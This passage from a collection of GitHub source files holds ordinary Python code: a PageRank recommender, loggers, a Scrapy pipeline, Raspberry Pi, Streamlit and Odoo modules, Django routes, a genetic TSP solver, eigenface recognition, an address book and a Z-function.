create_ranked_list_of_recommended_items(page_rank_vector_of_items, user_id, training_graph_users_items):\n # This is a list of 'item_id' sorted in descending order of score.\n sorted_list_of_recommended_items = []\n \n already_rated = training_graph_users_items['graph'][user_id]\n ranked_list = list(page_rank_vector_of_items.items())\n ranked_list.sort(key=lambda x:x[1], reverse = True)\n for t in ranked_list:\n if already_rated.get(t[0]) == None:\n sorted_list_of_recommended_items.append(t[0])\n \n return sorted_list_of_recommended_items\n\n\n\n\ndef discounted_cumulative_gain(user_id, sorted_list_of_recommended_items, test_graph_users_items):\n dcg = 0.\n raitings = test_graph_users_items['graph'][user_id]\n k = 1\n for i in sorted_list_of_recommended_items:\n if raitings.get(i) !=None:\n dcg+=raitings[i][\"weight\"]/math.log(k+1,2)\n k+=1\n return dcg\n\t\n \n\n\ndef maximum_discounted_cumulative_gain(user_id, test_graph_users_items):\n dcg = 0.\n raitings = test_graph_users_items['graph'][user_id]\n k = 1\n r = []\n for i in raitings.keys():\n r.append(raitings[i][\"weight\"])\n r.sort(reverse=True)\n for i in r:\n dcg+=i/math.log(k+1,2)\n k+=1\n return dcg\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Laolga/Page-rank-for-movie-recommendation","sub_path":"Network_Based_Recommendation_System_FUNCTIONS.py","file_name":"Network_Based_Recommendation_System_FUNCTIONS.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22392686107","text":"\"\"\"This 
module create a logger that is able to aggregate log messages.\"\"\"\n\nfrom logging import (\n getLogger,\n CRITICAL,\n FATAL,\n ERROR,\n WARNING,\n INFO,\n DEBUG,\n NOTSET,\n basicConfig,\n Logger,\n)\nfrom logging.handlers import SysLogHandler\nfrom os import path\n\nfrom logprep.util.log_aggregator import Aggregator\n\nname_to_level = {\n \"CRITICAL\": CRITICAL,\n \"FATAL\": FATAL,\n \"ERROR\": ERROR,\n \"WARN\": WARNING,\n \"WARNING\": WARNING,\n \"INFO\": INFO,\n \"DEBUG\": DEBUG,\n \"NOTSET\": NOTSET,\n}\n\n\nclass AggregatingLogger:\n \"\"\"Used to create logger that aggregates log messages.\"\"\"\n\n logger_config = None\n level_str = None\n log_level = None\n\n @classmethod\n def setup(cls, config: dict, logger_disabled: bool = False):\n \"\"\"Setup aggregating logger.\n\n Parameters\n ----------\n config : dict\n Logprep configuration\n logger_disabled : bool\n Defines if aggregating loggers are enabled or not\n\n \"\"\"\n cls.logger_disabled = logger_disabled\n cls.logger_config = config.get(\"logger\", dict())\n\n cls.level_str = cls.logger_config.get(\"level\", \"INFO\")\n\n cls.log_level = name_to_level.get(cls.level_str.upper(), INFO)\n basicConfig(\n level=cls.log_level, format=\"%(asctime)-15s %(name)-5s %(levelname)-8s: %(message)s\"\n )\n\n Aggregator.count_threshold = cls.logger_config.get(\"aggregation_threshold\", 4)\n Aggregator.log_period = cls.logger_config.get(\"aggregation_period\", 30)\n Aggregator.start_timer()\n\n @classmethod\n def create(cls, name: str) -> Logger:\n \"\"\"Create aggregating logger.\n\n Parameters\n ----------\n name : str\n Name for aggregating logger.\n\n Returns\n -------\n logger : logging.Logger\n Logger with aggregating filter\n\n \"\"\"\n logger = getLogger(name)\n logger.disabled = cls.logger_disabled\n\n if path.exists(\"/dev/log\"):\n logger.handlers = []\n logger.addHandler(SysLogHandler(address=\"/dev/log\"))\n\n if cls.level_str.upper() not in name_to_level.keys():\n logger.info(f\"Invalid log level '{cls.level_str.upper()}', defaulting to 'INFO'\")\n else:\n logger.setLevel(cls.log_level)\n logger.info(f\"Log level set to '{cls.level_str.upper()}'\")\n\n logger.addFilter(Aggregator(\"Agregator\"))\n\n return logger\n","repo_name":"herrfeder/Logprep","sub_path":"logprep/util/aggregating_logger.py","file_name":"aggregating_logger.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"36086556045","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymysql\nfrom twisted.enterprise import adbapi\nimport pymysql.cursors\nimport codecs,json\n\nclass MysqlTwistedPipeline(object):\n #通过twisted框架调用adbapi实现异步的数据写入\n def __init__(self,dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls,settings):\n #通过settings中设置的数据库信息,将数据库导入到pool中\n dbparms =dict(\n host = settings[\"MYSQL_HOST\"],\n db = settings[\"MYSQL_DBNAME\"],\n user = settings[\"MYSQL_USER\"],\n password = settings[\"MYSQL_PASSWORD\"],\n charset = \"utf8\",\n cursorclass = pymysql.cursors.DictCursor,\n use_unicode = True,\n )\n dbpool = adbapi.ConnectionPool(\"pymysql\",**dbparms)\n return cls(dbpool)\n\n def process_item(self, item, spider):\n #调用twisted的api实现异步插入\n query = self.dbpool.runInteraction(self.do_insert,item)\n query.addErrback(self.handle_err,item,spider)\n\n def 
handle_err(self,failure,item,spider):\n print(failure)\n\n def do_insert(self,cursor,item):\n #具体的插入函数\n #根据不同的item,构建不同的sql语句,并且插入到mysql中\n #plan1 if item.__class__.__name__ ==\"ArticleItem\" (通过item的名字来区别sql语句的写入)\n #plan 2 见items\n insert_sql,params = item.get_sql()\n cursor.execute(insert_sql,params)\n","repo_name":"kilort/zhihu","sub_path":"zhihu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74066451048","text":"import RPi.GPIO as GPIO\nfrom time import sleep\nfrom functools import partial\nimport lights_config as config\n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(config.button, GPIO.IN)\n\ndef createLight(pin):\n GPIO.setup(pin, GPIO.OUT)\n return partial(GPIO.output, pin)\n\ndef trackChange(init):\n value = [init]\n def changed(newValue):\n if (newValue == value[0]):\n return False\n value[0] = newValue\n return True\n\n return changed\n\ndef blink(light, time):\n while (time > 0):\n light(1)\n sleep(0.3)\n light(0)\n sleep(0.3)\n time -= 0.6\n\nbtnState = trackChange(GPIO.input(config.button))\nred = createLight(config.red)\nyellow = createLight(config.yellow)\ngreen = createLight(config.green)\nblue = createLight(config.blue)\n\ngreen(1)\n\ntry:\n while True:\n state = GPIO.input(config.button)\n change = btnState(state)\n if change == True:\n if state == True:\n green(0)\n yellow(1)\n sleep(0.6)\n yellow(0)\n red(1)\n blink(blue, 6)\n yellow(1)\n sleep(0.6)\n red(0)\n yellow(0)\n green(1)\n else:\n green(1)\nexcept KeyboardInterrupt:\n GPIO.cleanup()\n","repo_name":"fonzerelly/RaspberryPi_Experiments","sub_path":"lights/04_traffic_lights_on_button.py","file_name":"04_traffic_lights_on_button.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38990814259","text":"import streamlit, UTILS, PIL, numpy\nimport streamlit.components.v1 as components\n\n\ndef populate_tracks(tracks: list) -> None:\n tag = \"
\n    Top Tracks\n
    \"\n streamlit.markdown(tag, unsafe_allow_html=True)\n with streamlit.container():\n col1, col2, col3 = streamlit.columns([3, 3, 3])\n for i, track in enumerate(tracks):\n if i % 3 == 0:\n with col1:\n components.html(frame.format(track), height=400)\n elif i % 3 == 1:\n with col2:\n components.html(frame.format(track), height=400)\n else:\n with col3:\n components.html(frame.format(track), height=400)\n\n\ndef populate_emotion(emotion: str) -> None:\n left_color = UTILS.constants[\"colors\"][\"left\"]\n left_span = 'Identified Emotion: '\n left_span = left_span.format(left_color)\n\n emotion_color = UTILS.constants[\"colors\"][emotion]\n right_span = '{}'\n right_span = right_span.format(emotion_color, emotion.capitalize())\n\n tag = \"
\n    {}\n
    \"\n tag = tag.format(left_span + right_span)\n streamlit.markdown(tag, unsafe_allow_html=True)\n\n\nif __name__ == \"__main__\":\n tracks = UTILS.tracks\n frame = UTILS.constants[\"frame\"]\n picture = streamlit.camera_input(\"\")\n if picture is not None:\n picture = PIL.Image.open(picture)\n pixels = numpy.array(picture)\n emotion = UTILS.detect_emotion(pixels)\n if emotion:\n tracks = UTILS.get_top_k(emotion)\n populate_emotion(emotion)\n populate_tracks(tracks)\n else:\n tag = (\n '
\n    No face detected\n
    '\n )\n streamlit.markdown(tag, unsafe_allow_html=True)\n","repo_name":"ChitturiSaiSuman/Emotion-Aware-Music-Recommendation-System","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39929403636","text":"# -*- coding: utf-8 -*-\n\n# odoo imports\nfrom odoo import models\nfrom odoo import fields\nfrom odoo import api\nfrom odoo import exceptions\n\n# others imports\nimport datetime\n\n\nclass HouseLocationOffer(models.Model):\n _name = 'house.location.offer'\n _description = 'Property Offer'\n\n price = fields.Float(string=\"Price\", default=0, required=True, help=\"\",)\n\n status = fields.Selection(\n string=\"Status\",\n selection=[\n (\"accepted\", \"Accepted\"),\n (\"refused\", \"Refused\"),\n ],\n readonly=True,\n copy=False,\n )\n\n # who is a offer owner?\n partner_id = fields.Many2one(\n \"res.partner\", required=True, string=\"Partner\", help=\"\",)\n\n # virtual link with 'house.location' model\n property_id = fields.Many2one(\n \"house.location\", string=\"Property\", readonly=True, help=\"\",)\n\n # warning : is only filled in when the record is created, therefore you will need a fallback to prevent crashing at time of creation.\n create_date = fields.Date(string=\"Create Date\", copy=False,\n default=lambda *args: fields.Date.today(), readonly=True, help=\"\")\n validity = fields.Integer(string=\"Validity (days)\")\n date_deadline = fields.Date(\n string=\"Deadline\", compute=\"_compute_offer_deadline\", inverse=\"_inverse_offer_deadline\")\n\n # crud\n @api.model\n def create(self, vals):\n \"\"\"create new offer\n\n Args:\n vals (dict): offer properties values\n\n Raises:\n exceptions.ValidationError: an other offer with this vals['price'] already exists\n\n Returns:\n HouseLocationOffer: a new instance of HouseLocationOffer\n \"\"\"\n\n # warning : faire un filtre composite, les offres relatives a une seule maison\n\n offers_count = self.env['house.location.offer'].search(\n [('price', '=', vals['price'])], count=True,)\n\n if (offers_count > 0):\n raise exceptions.ValidationError(\n f\"[NEW OFFER ERROR] Property have already received this offer \\n {vals}\")\n\n else:\n return super(HouseLocationOffer, self).create(vals)\n\n # constrains\n @api.constrains('price')\n def _check_price(self):\n \"\"\"check price constraint\n\n Raises:\n exceptions.ValidationError: negative value or existing offer\n \"\"\"\n\n for record in self:\n offers_count = self.env['house.location.offer'].search(\n [('price', '=', record.price)], count=True,)\n\n if (record.price < 0):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] Price must be positive\")\n\n elif (offers_count > 1):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] An offer with this price already exist\")\n\n @api.constrains('validity')\n def _check_validity(self):\n \"\"\"check validity constraint\n\n Raises:\n exceptions.ValidationError: negative value\n \"\"\"\n\n for record in self:\n if (record.validity < 0):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] validity must be positive\")\n\n @api.constrains('date_deadline')\n def _check_date_deadline(self):\n \"\"\"check validity constraint\n\n Raises:\n exceptions.ValidationError: date deadline < create date\n \"\"\"\n\n for record in self:\n if (record.date_deadline < record.create_date):\n raise exceptions.ValidationError(\n f\"[OFFER ID : {record.id}] date deadline must be greater 
than create date\")\n\n # compute\n @api.depends('validity')\n def _compute_offer_deadline(self):\n \"\"\"compute deadline when validity value change\n \"\"\"\n\n for record in self:\n record.date_deadline = record.create_date + \\\n datetime.timedelta(days=record.validity)\n\n def _inverse_offer_deadline(self):\n \"\"\"compute validity when date_deadline value change\n \"\"\"\n\n for record in self:\n time_delta = record.date_deadline - record.create_date\n\n record.validity = time_delta.days\n\n # buttons actions\n\n def accept_offer(self):\n \"\"\"check offer acceptability and set offer status to 'accepted' if not other accepted offer\n\n Raises:\n exceptions.ValidationError: an other accepted offer already exists \n \"\"\"\n\n # check existing accepted offer\n best_offer = 0.0\n\n for record in self:\n if record.property_id.state == 'offer accepted': # il y a deja une offre accepted\n raise exceptions.UserError(\n f\"[OFFER ID : {record.id}] Property have already an accepted offer\")\n\n else:\n # house_location.state = 'offer accepted'\n record.status = \"accepted\"\n record.property_id.state = 'offer accepted'\n record.property_id.selling_price = record.price\n record.property_id.buyer = record.partner_id\n\n # update best offer\n if record.price > best_offer:\n best_offer = record.price\n record.property_id.best_price = record.price\n\n def refuse_offer(self):\n \"\"\"refuse an offer and set offer status to 'refused'\n \"\"\"\n\n best_offer = 0.0\n\n for record in self:\n if record.status == 'accepted': # c'etait une offre accepted\n record.property_id.state = 'offer received'\n record.property_id.selling_price = None\n record.property_id.buyer = None\n\n else:\n # house_location.state = 'offer accepted'\n pass\n\n # refuse offer\n record.status = \"refused\"\n\n # update best offer\n if record.price > best_offer:\n best_offer = record.price\n record.property_id.best_price = record.price\n","repo_name":"nathanbangwa243/odoo-addons","sub_path":"addons/house_location/models/house_location_offer.py","file_name":"house_location_offer.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70227640487","text":"# -*— codeing = utf-8 -*—\n# @Time : 2021/10/2012:41 上午\n# @Author : 房淡淡\n# @File : urls.py\n# @Software : PyCharm\nfrom django.urls import path,converters\nfrom django.urls.converters import register_converter\nfrom book.views import index,create,shop,register,json,set_cookie,get_cookie,set_session,get_session\nfrom book.views import LoginView,OrderView\n#1.重写转换器\nclass mobileConverter:\n regex = '1[3-9]\\d{9}'\n\n def to_python(self, value):\n return value\n\n def to_url(self, value):\n return value\n#注册转换器\nregister_converter(mobileConverter,\"mobile\")\n\nurlpatterns = [\n path('index/', index),\n path('create/',create),\n path('register/', register),\n path('json/',json),\n #使用转换器,系统自带的和重写的\n path('//',shop),\n path('set_cookie/',set_cookie),\n path('get_cookie/',get_cookie),\n path('set_session/',set_session),\n path('get_session/',get_session),\n path('login/',LoginView.as_view()),\n path('order/',OrderView.as_view()),\n]","repo_name":"fangyaxin555/Django_lianxi","sub_path":"bookmanger03/book/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34351753194","text":"import math\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cvxpy as 
cp\nimport csv\nimport imageio\n\nfrom scipy.stats import norm\n\n# mu = 0\n# sigma = 1\n# x = np.linspace(-3, 3, 100)\n# y = np.exp(-(x - mu) ** 2 / 2 * sigma ** 2) / sigma * np.sqrt(2 * math.pi)\n# plt.figure()\n# plt.plot(x, y, \"r-\", linewidth=2)\n# plt.savefig(\"screenshot/1.png\", transparent=True, pad_inches=0)\n\nx = np.random.normal(0, 1, 1000)\nmu, sigma = norm.fit(x)\nprint(mu, sigma)\nplt.figure()\nplt.subplot(211)\na = plt.hist(x, 4, density=True)\nplt.plot(a[1], norm.pdf(a[1]), \"r\")\nplt.subplot(212)\nb = plt.hist(x, 1000, density=True)\nplt.plot(b[1], norm.pdf(b[1]), \"r\")\nplt.savefig(\"screenshot/2.png\", transparent=True, pad_inches=0)\n\nx = np.random.normal(0, 1, 1000)\nx.sort()\nd = x.max() - x.min()\nj_h = 0\nlabel = 0\nj_ha = np.zeros(200)\nfor m in range(1, 201):\n hist, bins = np.histogram(x, m)\n h = d / m\n s = 0\n for item in hist:\n s += (item / 1000) ** 2\n temp = 2 / (h * 999) - s * 1001 / (h * 999)\n if m == 0:\n j_h = temp\n elif temp < j_h:\n label = m\n j_h = temp\n j_ha[m - 1] = j_h\n\nprint(label)\nplt.figure()\np = plt.hist(x, label, density=True)\nplt.plot(p[1], norm.pdf(p[1]), \"r\")\nplt.savefig(\"screenshot/3.png\", transparent=True, pad_inches=0)\n\nplt.figure()\nstep = np.linspace(1, 200, 200)\nplt.plot(step, j_ha)\nplt.savefig(\"screenshot/jha.png\", transparent=True, pad_inches=0)\nplt.show()\n","repo_name":"MoonOoOoO/ECE595","sub_path":"HW1/HW1_EX2.py","file_name":"HW1_EX2.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29370524282","text":"class Friends:\n def __init__(self, stupidlevel, howdumb, howfar, howbuddha, name):\n self.st = stupidlevel\n self.hd = howdumb\n self.hf = howfar\n self.hb = howbuddha\n self.name = name\n\n def SayHi(self):\n print(f\"Hi, {self.name}\")\n\nswayam = Friends(6, 11, 8, 14, \"Swayam\")\nswayam.SayHi()\nprint(swayam.hb)","repo_name":"JohnJoseph2007/python","sub_path":"Python/classexample.py","file_name":"classexample.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71807569448","text":"# travelling salesman problem using genetic algorithm\r\n\r\n\r\nfrom random import randrange\r\n\r\nstart=1\r\nn=1\r\ndis=[[]]\r\n\r\n\r\ndef population(size):\r\n assert size<=__import__('math').factorial(n)\r\n p=set()\r\n while len(p)j: i,j=j,i\r\n c=[0]*len(x)\r\n b=[False]*n\r\n for k in range(i,j+1):\r\n c[k]=y[k]\r\n b[y[k]]=True\r\n ix=0\r\n for z in ((0,i),(j+1,n)):\r\n for k in range(*z):\r\n while b[x[ix]]: ix+=1\r\n b[x[ix]]=True\r\n c[k]=x[ix]\r\n c[-1]=start\r\n return c\r\n\r\ndef mutate(x):\r\n i,j=randrange(1,n),randrange(1,n)\r\n x[i],x[j] = x[j],x[i]\r\n\r\ndef selection(population,fitness,_top=33):\r\n i=randrange(len(fitness)//3)\r\n return (sorted(zip(fitness,population))[i])[1] # top 33% default\r\n\r\ndef genetic_algo(popu,max_iter=10000):\r\n fit=fitness(popu)\r\n from tqdm import tqdm\r\n for _ in tqdm(range(max_iter)):\r\n next_gen=[]\r\n for j in range(len(popu)):\r\n x=selection(popu,fit)\r\n y=selection(popu,fit)\r\n child=crossover(x,y)\r\n if randrange(10101)%3==0:\r\n mutate(child)\r\n next_gen.append(child)\r\n popu=next_gen\r\n fit=fitness(popu)\r\n return sorted(popu,key=score)[0]\r\n\r\n\r\ndef main():\r\n random_graph(1)\r\n p=population(300)\r\n x=genetic_algo(p,1000)\r\n print(x)\r\n print(score(x))\r\n\r\n\r\ndef random_graph(show=False):\r\n global n,dis,start\r\n 
n=randrange(15,100)\r\n start=randrange(n)\r\n dis=[[0]*n for i in range(n)]\r\n for i in range(n):\r\n for j in range(i+1,n):\r\n dis[i][j]=dis[j][i]=randrange(1,51)\r\n if show:\r\n print(n)\r\n print(start)\r\n for i in range(n):\r\n for j in range(i+1,n):\r\n print(i,j,dis[i][j])\r\n # print(f'{i} -> {j} : {dis[i][j]}')\r\n\r\n\r\n\r\nmain()\r\n","repo_name":"fnvir/ml","sub_path":"ml/z/tsp_genetic.py","file_name":"tsp_genetic.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70865383529","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\ndataset_path = os.listdir(\r\n \"PATH_TO_FOLDERS_OF_FACE_IMAGES\")\r\ntest_data = \"PATH_TO_TEST_FACE_IMAGES\"\r\npersons = []\r\nprec = []\r\ntraining_start = time.time()\r\n\r\nfor count, dir_name in enumerate(dataset_path, start=1):\r\n person_map = {\"id\": count, \"name\": dir_name}\r\n persons.append(person_map)\r\n\r\n\r\ndef detect_face(image):\r\n grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier(\r\n \"haarcascade_frontalface_default.xml\")\r\n detected_face = face_cascade.detectMultiScale(\r\n grayscale, scaleFactor=1.1, minNeighbors=7)\r\n\r\n if(len(detected_face) == 0):\r\n return None, None\r\n x, y, w, h = detected_face[0]\r\n return grayscale[y:y+w, x:x+h], detected_face[0]\r\n\r\n\r\ndef prep_training_data(path_to_data):\r\n directories = os.listdir(path_to_data)\r\n faces = []\r\n labels = []\r\n label = 0\r\n for directory in directories:\r\n label_id = [i['id'] for i in persons if i['name'] == directory]\r\n label = int(label_id[0])\r\n person_dir = path_to_data + \"/\" + directory\r\n person_images = os.listdir(person_dir)\r\n\r\n for n_image in person_images:\r\n if n_image.startswith(\".\"):\r\n continue\r\n path_of_image = person_dir + \"/\" + n_image\r\n image = cv2.imread(path_of_image)\r\n img = cv2.resize(image, (250, 250))\r\n\r\n face, bounding_box = detect_face(img)\r\n if face is not None:\r\n face = cv2.resize(face, (100, 100))\r\n faces.append(face)\r\n labels.append(label)\r\n return faces, labels\r\n\r\n\r\nfaces, labels = prep_training_data(dataset_path)\r\neigenfaces_face_recognition = cv2.face.EigenFaceRecognizer_create()\r\neigenfaces_face_recognition.train(faces, np.array(labels))\r\n\r\ntraining_end = time.time()\r\n\r\n\r\ndef draw_rect(img, rect):\r\n (x, y, w, h) = rect\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (236, 110, 173), 2)\r\n\r\n\r\ndef draw_text(img, text, x, y):\r\n cv2.putText(img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX,\r\n 0.7, (52, 148, 230), 2)\r\n\r\n\r\ndef predict(face_image):\r\n prediction_start = time.time()\r\n img = face_image.copy()\r\n face, rect = detect_face(img)\r\n face = cv2.resize(face, (100, 100))\r\n label, distance = eigenfaces_face_recognition.predict(face)\r\n print(f\"RECOGNIZED LABEL {label} with {round(distance, 2)}%\")\r\n get_from_dict = [i['name'] for i in persons if i['id'] == label]\r\n person = str(get_from_dict[0])\r\n draw_rect(img, rect)\r\n draw_text(img, person, rect[0], rect[1]-5)\r\n prediction_end = time.time()\r\n print(f\"Predicted in {prediction_end - prediction_start} s \")\r\n prec.append(str(prediction_end - prediction_start) + \"\\n\")\r\n return img\r\n\r\n\r\ndef test_faces(path_to_test_data):\r\n images = os.listdir(path_to_test_data)\r\n for image in images:\r\n path_of_test_img = path_to_test_data + \"/\" + image\r\n print(image)\r\n if 
image.startswith(\".\"):\r\n continue\r\n img = cv2.imread(path_of_test_img)\r\n print(f\"Test data shape: {img.shape}\")\r\n prediction = predict(img)\r\n cv2.imshow(image, prediction)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\nprint(f\"Trained in: {training_end - training_start}\")\r\nprint(\"Starting...\")\r\n\r\ntest_faces(test_data)\r\n","repo_name":"tomzs/face-recogniton","sub_path":"eigenfaces.py","file_name":"eigenfaces.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25547367163","text":"import calendar\nfrom collections import UserDict\nfrom datetime import datetime\nfrom itertools import islice\nimport csv\n\nclass Field:\n def __init__(self, value: str):\n self._value = None\n self.value = value\n\n def __str__(self) -> str:\n return f\"{self._value}\"\n\n def __repr__(self) -> str:\n return f\"{self._value}\"\n\nclass Birthday(Field):\n \n @property\n def value(self) -> datetime.date:\n return self._value\n\n @value.setter\n def value(self, value):\n\n if value is None:\n return f\"You don't add birthday\"\n\n try: \n self._value = datetime.strptime(value, \"%d-%m-%Y\").date()\n except ValueError:\n print(f\"Entered {value} is not correct date. Please use format: 'dd-mm-yyyy'\")\n\n def __repr__(self) -> str:\n return datetime.strftime(self._value, \"%d-%m-%Y\")\n \nclass Name(Field):\n @property\n def value(self):\n return self._value\n \n @value.setter\n def value(self, value):\n self._value = value\n\n\nclass Phone(Field):\n\n @property\n def value(self):\n return self._value\n \n @value.setter\n def value(self, value):\n phone_number = (value.strip()\n .removeprefix(\"+\")\n .replace(\"-\", \"\")\n .replace(\" \", \"\"))\n \n if not (phone_number.isdigit() \n and phone_number.startswith(\"380\") \n and len(phone_number) == 12):\n raise ValueError\n self._value = phone_number\n\n\nclass Record:\n def __init__(self, name: Name, phones: list[Phone] = [], birthday: Birthday = None):\n self.name = name\n self.phones = phones\n self.birthday = birthday\n\n\n def add_phone_field(self, phone_number: Phone):\n self.phones.append(phone_number)\n \n \n def delete_phone_field(self, phone_number: Phone):\n for i in self.phones:\n if i.value == phone_number.value:\n self.phones.remove(i)\n return f'Phone {i.value} delete successful.'\n return f'Phone {phone_number.value} not found'\n\n\n def change_phone_field(self, old_number: Phone, new_number: Phone):\n for i, p in enumerate(self.phones):\n if p.value == old_number.value:\n self.phones[i] = new_number\n return f\"Phone {old_number.value} changed on {new_number.value}\"\n return f\"Contact does not contain such phone number: {old_number}\"\n \n# check enter data from user\n def match_param(self, param):\n if str(param).lower() in str(self.name.value).lower():\n return True\n \n for phone in self.phones:\n if param in phone.value:\n return True\n return False\n\n\n def add_birthday_field(self, birthday: Birthday):\n self.birthday = birthday\n\n\n def days_to_birthday(self):\n current_date = datetime.now()\n\n if self.birthday is not None:\n birthday: datetime.date = self.birthday.value.date()\n \n next_birthday = datetime(\n year=current_date.year, \n month=birthday.month, \n day=birthday.day\n ).date()\n\n if next_birthday < current_date:\n next_birthday = datetime(\n year=next_birthday.year + 1,\n month=next_birthday.month,\n day=next_birthday.day\n )\n return (next_birthday - current_date).days\n return None\n \n 
def __str__(self) -> str:\n return f\"Name {self.name} phones: {';'.join([str(p) for p in self.phones])} {str(self.birthday) if self.birthday else ''}\"\n \nclass AddressBook(UserDict):\n index = 0 # add for hw 11\n filename = \"contacts_book.csv\"\n\n def add_record(self, rec: Record):\n self.data[rec.name.value] = rec\n \n def show_all(self):\n return '\\n'.join([f'{r.name.value} : {\",\".join([str(p) for p in r.phones])}' for r in self.data.values()])\n\n def iteration(self, step=5):\n while AddressBook.index < len(self):\n yield list(islice(self.items(), AddressBook.index, AddressBook.index+step))\n if AddressBook.IndentationError > len(self):\n raise StopIteration()\n AddressBook.index += step\n\n def open_file(self):\n with open(self.filename, \"r\") as file:\n reader = csv.DictReader(file, delimiter=',')\n for row in reader:\n self.add_record(Record(Name(row['name']),\n [Phone(p) for p in row['phones'].split(';')],\n Birthday(row['birthday']) if row['birthday'] != 'None' else None))\n\n def save_to_file(self):\n with open(self.filename, 'w', newline='') as file:\n header_names = ['name', 'phones', 'birthday']\n writer = csv.DictWriter(file, fieldnames=header_names, delimiter=',')\n writer.writeheader()\n for rec in self.data.values():\n writer.writerow({'name': str(rec.name), \n 'phones': ';'.join([str(p) for p in rec.phones]), \n 'birthday': str(rec.birthday)})\n\n # def search(self, name, phone):\n # try:\n # return self.data[str(name).lower().capitalize(), phone]\n \n # except KeyError:\n # return \"Name not found\"\n\n def search(self, param):\n contacts = []\n for record in self.data.values():\n if record.match_param(param):\n contacts.append(record)\n return contacts\n \n\n\n \n \n \n \n \n \n\n","repo_name":"DenysPhV/HW-12-Serialized","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27627700077","text":"def trivial_algorithm(prefix_length, string, index):\n while index + prefix_length < len(string) and string[prefix_length] == string[index + prefix_length]:\n prefix_length += 1\n return prefix_length\n\n\ndef get_z_function(string: str) -> list:\n z_array = []\n for index, symbol in enumerate(string):\n z_array.append(0)\n if index == 0:\n continue\n while index + z_array[index] < len(string) and string[z_array[index]] == string[index + z_array[index]]:\n z_array[index] += 1\n return z_array\n\n\ndef get_z_function_effectively(string: str) -> list:\n z_array = []\n rightmost_found_prefix_index = 0\n leftmost_found_prefix_index = 0\n for index, symbol in enumerate(string):\n if index == 0:\n z_array.append(0)\n continue\n if index > rightmost_found_prefix_index:\n prefix_length = 0\n else:\n prefix_length = min(\n z_array[index - leftmost_found_prefix_index],\n rightmost_found_prefix_index - index + 1\n )\n while index + prefix_length < len(string) and string[prefix_length] == string[index + prefix_length]:\n prefix_length += 1\n z_array.append(prefix_length)\n prefix_end_index = index + prefix_length - 1\n if prefix_end_index > rightmost_found_prefix_index:\n leftmost_found_prefix_index = index\n rightmost_found_prefix_index = prefix_end_index\n return z_array\n\n\nif __name__ == '__main__':\n string = 'aaaaa'\n print(get_z_function(string))\n string = 'abaaba'\n print(get_z_function(string))\n string = 'aaabaab'\n print(get_z_function(string))\n string = 'abacaba'\n print(get_z_function(string))\n\n print()\n\n string = 
'aaaaa'\n print(get_z_function_effectively(string))\n string = 'abaaba'\n print(get_z_function_effectively(string))\n string = 'abaabaaba'\n print(get_z_function_effectively(string))\n string = 'aabaab'\n print(get_z_function_effectively(string))\n string = 'abacabacabacabac'\n print(get_z_function_effectively(string))\n string = 'abcdefg_abcdefg1_abcdefg_abcdefg1_abcdefg_abcdefg1_abcdefg_abcdefg1_'\n print(get_z_function_effectively(string))\n string = 'abacaba'\n print(get_z_function_effectively(string))\n","repo_name":"AndreyAD1/mipt_course","sub_path":"lesson_13_stack/ex_1_z_function.py","file_name":"ex_1_z_function.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26898798845","text":"import time\n\nfrom fate_arch.common.log import getLogger\n\nLOGGER = getLogger()\n\n\ndef nretry(func):\n \"\"\"retry connection\n \"\"\"\n\n def wrapper(self, *args, **kwargs):\n \"\"\"wrapper\n \"\"\"\n res = None\n exception = None\n for ntry in range(10):\n try:\n res = func(self, *args, **kwargs)\n exception = None\n break\n except Exception as e:\n LOGGER.error(\"function %s error\" % func.__name__, exc_info=True)\n exception = e\n time.sleep(1)\n\n if exception is not None:\n 